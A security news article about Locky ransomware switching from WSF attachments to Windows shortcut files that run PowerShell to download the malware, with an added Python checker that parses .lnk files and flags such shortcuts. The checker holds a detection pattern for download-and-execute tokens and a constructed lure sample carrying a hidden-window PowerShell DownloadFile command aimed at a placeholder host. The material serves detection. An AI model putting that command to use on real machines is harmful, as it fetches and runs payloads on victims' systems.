Locky ransomware has dominated the spam email realm throughout this year. Research conducted by Proofpoint revealed that 97% of all malicious spam email attachments were distributing Locky. With word about the virus’ propagation vector spreading, a change of strategy was required: the carrier was switched from WSF files to LNK files.
Since its inception, Locky has been spread through three different carriers: ZIP archives, macro-laced MS Office files and exploit kits. ZIP archives have been the most prominent distribution technique. They contain multiple files, some or all of which are packed with the Locky executable. When one of them is executed, the installer drops the ransomware through an automated process.
The next chapter in the history of Locky has unfolded
The timeline of the virus’ distribution patterns can be divided into separate periods. Chronologically, the ZIP archives first contained JS files, then HTA files, and later WSF files. The Microsoft Malware Protection Center reported that Locky ransomware has made its latest change, switching to LNK files.
“We observed that the Locky ransomware writers, possibly upon seeing that some emails are being proactively blocked, changed the attachment from .wsf files to shortcut files (.LNK extension) that contain PowerShell commands to download and run Locky,” a representative of the research team explained.
With the change of carrier, Locky seems to be moving away from the Nemucod downloader. The program is used as an intermediary that establishes the link between the ZIP archive and the ransomware. Nemucod helps gain boot persistence, which is required to initiate the download of the virus. Another use of the application is checking infected devices for sandboxed environments. The decline in the use of Nemucod is further confirmation that the developers of Locky have taken a different approach.
Shortcuts to lockdown – the newest trend in Locky distribution
The latest carrier the operators of Locky have chosen is LNK files, the file format of Windows shortcuts. Shortcuts give quick access to selected directories and programs on the computer. LNK files have been used, and continue to be used, as a downloader for different ransomware families.
The download of Locky is initiated by pointing the shortcut at a default system component: the ransomware uses PowerShell as its means of transport. PowerShell is a scripting and automation language present in all versions of the Windows OS, and this component is easy to abuse. Malware distributors often use it to install rogue programs through an automated process; no separate permission from the user is requested to run that process. The ransomware is fetched by a PowerShell script packaged in the shortcut and executed when the corrupted file is opened.
The image below illustrates how the distribution is carried out. The LNK file is a shortcut to the PowerShell utility; clicking it triggers execution of the preset parameters and commands.
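The following checker is an added example, not code from the original article or from any of the research teams it cites: it parses the StringData section of a Windows shell link (.lnk), extracts the target path and command-line arguments, and flags shortcuts that point at PowerShell with download-and-run or hidden-window switches, which is the pattern this article describes. The two sample shortcuts are constructed inside the block, and the URL in the lure sample is a placeholder.

```python
# Added example: parse .lnk StringData and flag PowerShell download-and-run shortcuts.
import re
import struct

HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData entries in on-disk order: (LinkFlags bit, field name)
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Tokens a defender would expect in a download-and-run PowerShell shortcut
INDICATORS = re.compile(r"(?i)downloadfile|downloadstring|invoke-webrequest|"
                        r"\biex\b|invoke-expression|-e(c|nc|ncodedcommand)?\s|hidden")

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields (relative_path, arguments, ...) of a .lnk."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a shell link: HeaderSize must be 0x4C")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                    # skip LinkTargetIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # skip LinkInfo (size-prefixed)
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
            pos += 2
            fields[name] = data[pos:pos + count * width].decode(codec)
            pos += count * width
    return fields

def is_suspicious(fields: dict) -> bool:
    """True when the shortcut targets PowerShell and carries download/hidden switches."""
    cmd = fields.get("relative_path", "") + " " + fields.get("arguments", "")
    return "powershell" in cmd.lower() and INDICATORS.search(cmd) is not None

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk: header + RelativePath + Arguments (Unicode)."""
    flags = 0x08 | 0x20 | IS_UNICODE
    header = struct.pack("<I", 76) + bytes(16) + struct.pack("<I", flags) + bytes(52)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body

# Constructed samples; the URL is a placeholder, not a real indicator.
LURE = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "-WindowStyle Hidden -Command \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://placeholder.invalid/p', 'p.exe')\"")
BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")
```

Real-world shortcuts usually also carry a LinkTargetIDList and LinkInfo, which the parser skips by their size fields; the verdict should be combined with the shortcut's icon and mail-attachment context rather than used alone.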
Apart from being easy to execute, installation through LNK files is more deceptive. Unlike other file types, a shortcut has no fixed default icon, so the compromised files can appear with different icons in different cases.
Logically, the LNK campaigns are connected to the latest version of Locky ransomware: they spread the variant that appends the ODIN suffix. This is further proof that the change of carrier was made recently.